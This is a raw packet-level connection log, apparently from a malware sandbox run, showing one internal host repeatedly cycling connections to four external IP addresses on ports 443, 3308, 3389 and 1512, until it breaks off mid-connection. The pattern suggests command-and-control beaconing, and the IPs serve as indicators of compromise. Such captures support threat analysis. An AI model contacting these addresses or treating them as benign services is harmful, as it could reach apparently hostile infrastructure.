Jan 12, 2021 07:41:45.707119942 CET	49374	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:45.707365990 CET	49374	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:45.759192944 CET	443	49374	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:45.759213924 CET	443	49374	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:45.761490107 CET	49374	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:45.813486099 CET	443	49374	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:45.932466984 CET	443	49374	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:45.932495117 CET	443	49374	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:45.932703972 CET	49374	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:45.935838938 CET	49374	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:45.987684965 CET	443	49374	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:46.045692921 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:46.088860035 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:46.088974953 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:46.090490103 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:46.133543968 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:46.144234896 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:46.144258022 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:46.144366980 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:46.144390106 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:46.157407999 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:46.202156067 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:46.202322006 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:46.208760977 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:46.208992958 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:46.251986027 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:46.252187014 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:46.293051004 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:46.295382977 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:46.295414925 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:46.408541918 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:46.408562899 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:46.408620119 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:46.412440062 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:46.455599070 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:46.525226116 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:46.579063892 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:46.579170942 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:46.580043077 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:46.633582115 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:46.650028944 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:46.650059938 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:46.650173903 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:46.658904076 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:46.717912912 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:46.718094110 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:46.725964069 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:46.726066113 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:46.779733896 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:46.780215025 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:46.819493055 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:46.834057093 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:46.834100962 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:46.924906969 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:46.924936056 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:46.925167084 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:46.928941965 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:46.982479095 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:47.040994883 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:47.093974113 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:47.094054937 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:47.095150948 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:47.147921085 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:47.154781103 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:47.154819012 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:47.154889107 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:47.154916048 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:47.171166897 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:47.225246906 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:47.225436926 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:47.230813026 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:47.231096029 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:47.284104109 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:47.284348965 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:47.321203947 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:47.337193966 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:47.441696882 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:47.441724062 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:47.441890955 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:47.445066929 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:47.497921944 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:47.559026003 CET	49378	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:47.611401081 CET	443	49378	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:47.611522913 CET	49378	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:47.612934113 CET	49378	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:47.665107012 CET	443	49378	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:47.679960012 CET	443	49378	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:47.680073977 CET	49378	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:47.696388960 CET	49378	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:47.750787973 CET	443	49378	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:47.751007080 CET	49378	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:47.759094000 CET	49378	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:47.759247065 CET	49378	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:47.811261892 CET	443	49378	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:47.811508894 CET	49378	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:47.850909948 CET	443	49378	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:47.864845991 CET	443	49378	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:47.982556105 CET	443	49378	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:47.982608080 CET	443	49378	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:47.982810020 CET	49378	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:47.985668898 CET	49378	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:48.038033962 CET	443	49378	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:48.105288029 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:48.148706913 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:48.148969889 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:48.150932074 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:48.194113970 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:48.204647064 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:48.204669952 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:48.204797029 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:48.220195055 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:48.264986038 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:48.265235901 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:48.272424936 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:48.272640944 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:48.315586090 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:48.315900087 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:48.354983091 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:48.359004974 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:48.471518040 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:48.471553087 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:48.471834898 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:48.473879099 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:48.516942978 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:48.589152098 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:48.642935991 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:48.643117905 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:48.644417048 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:48.698481083 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:48.713113070 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:48.713136911 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:48.713263988 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:48.719391108 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:48.779872894 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:48.779962063 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:48.784140110 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:48.784194946 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:48.838268042 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:48.838459969 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:48.877482891 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:48.892196894 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:48.892219067 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:48.983428955 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:48.983457088 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:48.983823061 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:48.991319895 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:49.047597885 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:49.103823900 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:49.156558990 CET	1512	49381	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:49.156755924 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:49.158716917 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:49.211291075 CET	1512	49381	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:49.218324900 CET	1512	49381	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:49.218344927 CET	1512	49381	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:49.218493938 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:49.236576080 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:49.290429115 CET	1512	49381	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:49.290607929 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:49.298669100 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:49.298983097 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:49.351727009 CET	1512	49381	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:49.351972103 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:49.404691935 CET	1512	49381	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:49.505635977 CET	1512	49381	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:49.505657911 CET	1512	49381	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:49.505933046 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:49.508855104 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:49.561414003 CET	1512	49381	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:49.619323969 CET	49382	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:49.671250105 CET	443	49382	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:49.671415091 CET	49382	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:49.673238039 CET	49382	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:49.725496054 CET	443	49382	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:49.740036011 CET	443	49382	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:49.740211964 CET	49382	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:49.754946947 CET	49382	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:49.809161901 CET	443	49382	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:49.809259892 CET	49382	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:49.819931030 CET	49382	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:49.820271969 CET	49382	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:49.872499943 CET	443	49382	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:49.872924089 CET	49382	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:49.924941063 CET	443	49382	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:50.051676035 CET	443	49382	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:50.051698923 CET	443	49382	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:50.051971912 CET	49382	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:50.057254076 CET	49382	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:50.109055996 CET	443	49382	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:50.180469990 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:50.223642111 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:50.223783970 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:50.225141048 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:50.268258095 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:50.282849073 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:50.282871008 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:50.283041954 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:50.302081108 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:50.346843958 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:50.347031116 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:50.352251053 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:50.352382898 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:50.395334005 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:50.395584106 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:50.435252905 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:50.438616037 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:50.438652039 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:50.551935911 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:50.551985025 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:50.552160978 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:50.557751894 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:50.600971937 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:50.679194927 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:50.733270884 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:50.733397007 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:50.734535933 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:50.788513899 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:50.810903072 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:50.810946941 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:50.811018944 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:50.825099945 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:50.885672092 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:50.886065960 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:50.896955013 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:50.897183895 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:50.951725006 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:50.951895952 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:50.990891933 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:51.006072044 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:51.006119013 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:51.095865965 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:51.095895052 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:51.095952034 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:51.095973969 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:51.098203897 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:51.152101994 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:51.210376978 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:51.263416052 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:51.263581991 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:51.265126944 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:51.317986012 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:51.325175047 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:51.325227022 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:51.325284958 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:51.325373888 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:51.340070009 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:51.394087076 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:51.394335032 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:51.400201082 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:51.400381088 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:51.453118086 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:51.453485966 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:51.493035078 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:51.506321907 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:51.506371975 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:51.603193045 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:51.603259087 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:51.603492022 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:51.609142065 CET	49385	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:51.662039042 CET	1512	49385	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:51.721227884 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:51.773619890 CET	443	49386	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:51.773709059 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:51.774566889 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:51.826698065 CET	443	49386	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:51.841461897 CET	443	49386	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:51.841604948 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:51.858251095 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:51.912959099 CET	443	49386	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:51.913173914 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:51.921750069 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:51.921997070 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:51.977586031 CET	443	49386	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:51.977730036 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:52.010905981 CET	443	49386	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:52.029731035 CET	443	49386	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:52.149374962 CET	443	49386	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:52.149477005 CET	443	49386	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:52.149553061 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:52.149581909 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:52.152486086 CET	49386	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:52.204780102 CET	443	49386	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:52.266551971 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:52.310041904 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:52.310180902 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:52.311034918 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:52.354170084 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:52.369234085 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:52.369277954 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:52.369326115 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:52.369378090 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:52.381035089 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:52.427014112 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:52.427508116 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:52.439744949 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:52.439956903 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:52.483134985 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:52.483325958 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:52.522147894 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:52.526467085 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:52.526504993 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:52.639595985 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:52.639641047 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:52.639781952 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:52.643086910 CET	49387	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:52.686242104 CET	3308	49387	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:52.751568079 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:52.806194067 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:52.806298018 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:52.807248116 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:52.861799955 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:52.877260923 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:52.877310038 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:52.877546072 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:52.886970043 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:52.949146032 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:52.949341059 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:52.954607964 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:52.954787016 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:53.009491920 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:53.009785891 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:53.048660994 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:53.063816071 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:53.063838959 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:53.154727936 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:53.154766083 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:53.154891968 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:53.157948971 CET	49388	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:53.212007046 CET	3389	49388	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:53.265633106 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:53.318536043 CET	1512	49389	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:53.318655968 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:53.319746017 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:53.372627974 CET	1512	49389	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:53.379601002 CET	1512	49389	46.105.131.65	192.168.2.22
